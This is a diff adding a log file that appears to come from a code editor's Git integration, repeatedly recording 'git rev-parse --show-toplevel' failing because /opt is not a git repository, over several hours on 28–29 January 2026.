-0,0 +1,392 @@ +2026-01-28 19:56:59.001 [info] [main] Log level: Info +2026-01-28 19:56:59.001 [info] [main] Validating found git in: "git" +2026-01-28 19:56:59.001 [info] [main] Using git "2.39.5" from "git" +2026-01-28 19:56:59.001 [info] [Model][doInitialScan] Initial repository scan started +2026-01-28 19:56:59.001 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 19:56:59.001 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 19:56:59.001 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 19:56:59.001 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 19:56:59.001 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 19:56:59.001 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 19:56:59.001 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 19:56:59.001 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 19:56:59.001 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 19:56:59.001 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 19:56:59.001 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 19:56:59.001 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 19:56:59.001 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 19:56:59.001 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 19:56:59.001 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 19:56:59.001 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 19:56:59.001 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 19:56:59.001 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 19:56:59.001 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 19:56:59.001 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 19:56:59.001 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 19:56:59.001 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 19:56:59.001 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 19:56:59.001 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 19:56:59.001 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 19:56:59.001 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 19:56:59.001 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 19:56:59.001 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 19:56:59.001 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-28 19:56:59.001 [info] > git rev-parse --show-toplevel [6ms] +2026-01-28 19:56:59.001 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 19:56:59.001 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 19:56:59.001 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 19:56:59.343 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 19:56:59.343 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 19:56:59.492 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 19:56:59.492 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 19:57:00.136 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 19:57:00.136 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 20:04:59.251 [info] > git rev-parse --show-toplevel [3ms] +2026-01-28 20:04:59.251 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 20:05:39.861 [info] > git rev-parse --show-toplevel [3ms] +2026-01-28 20:05:39.861 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 20:06:12.357 [info] > git rev-parse --show-toplevel [0ms] +2026-01-28 20:06:12.357 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 20:06:43.131 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 20:06:43.131 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 20:07:11.562 [info] > git rev-parse --show-toplevel [4ms] +2026-01-28 20:07:11.562 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 20:15:01.892 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 20:15:01.892 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 20:15:08.056 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 20:15:08.056 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 20:31:11.361 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 20:31:11.361 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 20:34:43.252 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 20:34:43.252 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 20:35:19.057 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 20:35:19.057 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 20:35:46.543 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 20:35:46.543 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 20:35:53.433 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 20:35:53.433 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 20:35:57.353 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 20:35:57.353 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 20:36:13.228 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 20:36:13.228 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 20:36:24.698 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 20:36:24.698 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 20:36:32.376 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 20:36:32.376 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 20:45:21.187 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 20:45:21.187 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 20:48:54.343 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 20:48:54.343 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 20:49:05.433 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 20:49:05.433 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 20:49:16.267 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 20:49:16.267 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 21:14:32.123 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 21:14:32.123 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 21:14:38.346 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 21:14:38.346 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 21:21:46.370 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 21:21:46.370 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 21:31:58.511 [info] > git rev-parse --show-toplevel [3ms] +2026-01-28 21:31:58.511 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 21:32:05.228 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 21:32:05.228 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 21:32:20.116 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 21:32:20.116 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 21:32:31.206 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 21:32:31.206 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 21:32:41.736 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 21:32:41.736 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 21:32:46.490 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 21:32:46.490 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 21:33:02.420 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 21:33:02.420 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 21:35:17.426 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 21:35:17.426 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 21:35:29.290 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 21:35:29.290 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 21:35:37.272 [info] > git rev-parse --show-toplevel [4ms] +2026-01-28 21:35:37.272 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 21:35:45.221 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 21:35:45.221 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 21:35:53.315 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 21:35:53.315 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 21:44:05.382 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 21:44:05.382 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 21:44:14.532 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 21:44:14.532 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 21:44:23.164 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 21:44:23.164 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:00:17.950 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 22:00:17.950 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:03:10.370 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 22:03:10.370 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:04:34.833 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 22:04:34.833 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:04:45.991 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 22:04:45.991 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:04:56.589 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 22:04:56.589 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:05:06.850 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 22:05:06.850 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:12:00.009 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 22:12:00.009 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:12:09.010 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 22:12:09.010 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:12:14.473 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 22:12:14.473 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:12:15.356 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 22:12:15.356 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:12:21.620 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 22:12:21.620 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:16:40.084 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 22:16:40.084 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:16:50.962 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 22:16:50.962 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:17:00.409 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 22:17:00.409 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:17:03.085 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 22:17:03.085 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:25:18.005 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 22:25:18.005 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:27:42.997 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 22:27:42.997 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:27:51.939 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 22:27:51.939 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:28:04.360 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 22:28:04.360 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:32:20.164 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 22:32:20.164 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:34:18.500 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 22:34:18.500 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:35:04.308 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 22:35:04.308 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:35:22.872 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 22:35:22.872 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:38:54.246 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 22:38:54.246 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:40:55.752 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 22:40:55.753 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:41:16.080 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 22:41:16.080 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:41:45.617 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 22:41:45.617 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:43:35.988 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 22:43:35.988 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:44:50.957 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 22:44:50.957 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:47:39.959 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 22:47:39.959 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:47:47.905 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 22:47:47.905 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:47:55.702 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 22:47:55.702 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:49:06.660 [info] > git rev-parse --show-toplevel [4ms] +2026-01-28 22:49:06.660 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:49:52.566 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 22:49:52.566 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:50:43.516 [info] > git rev-parse --show-toplevel [5ms] +2026-01-28 22:50:43.516 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:51:07.067 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 22:51:07.067 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:51:07.865 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 22:51:07.865 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:51:09.731 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 22:51:09.731 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:51:12.915 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 22:51:12.915 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:55:02.442 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 22:55:02.442 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:55:28.406 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 22:55:28.406 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:56:02.098 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 22:56:02.099 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:56:39.942 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 22:56:39.943 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:58:02.471 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 22:58:02.471 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 22:59:26.887 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 22:59:26.887 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 23:09:08.996 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 23:09:08.996 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 23:12:50.947 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 23:12:50.947 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 23:13:47.912 [info] > git rev-parse --show-toplevel [3ms] +2026-01-28 23:13:47.912 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 23:15:51.068 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 23:15:51.068 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 23:19:22.725 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 23:19:22.726 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 23:28:01.993 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 23:28:01.993 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 23:29:01.160 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 23:29:01.160 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 23:29:02.006 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 23:29:02.006 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 23:36:35.626 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 23:36:35.626 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 23:37:40.353 [info] > git rev-parse --show-toplevel [3ms] +2026-01-28 23:37:40.353 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 23:38:18.039 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 23:38:18.039 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 23:48:34.548 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 23:48:34.548 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 23:51:50.090 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 23:51:50.090 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 23:51:50.653 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 23:51:50.653 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 23:52:33.412 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 23:52:33.412 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 23:54:36.792 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 23:54:36.792 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 23:57:22.469 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 23:57:22.469 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:02:32.237 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 00:02:32.237 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:03:56.260 [info] > 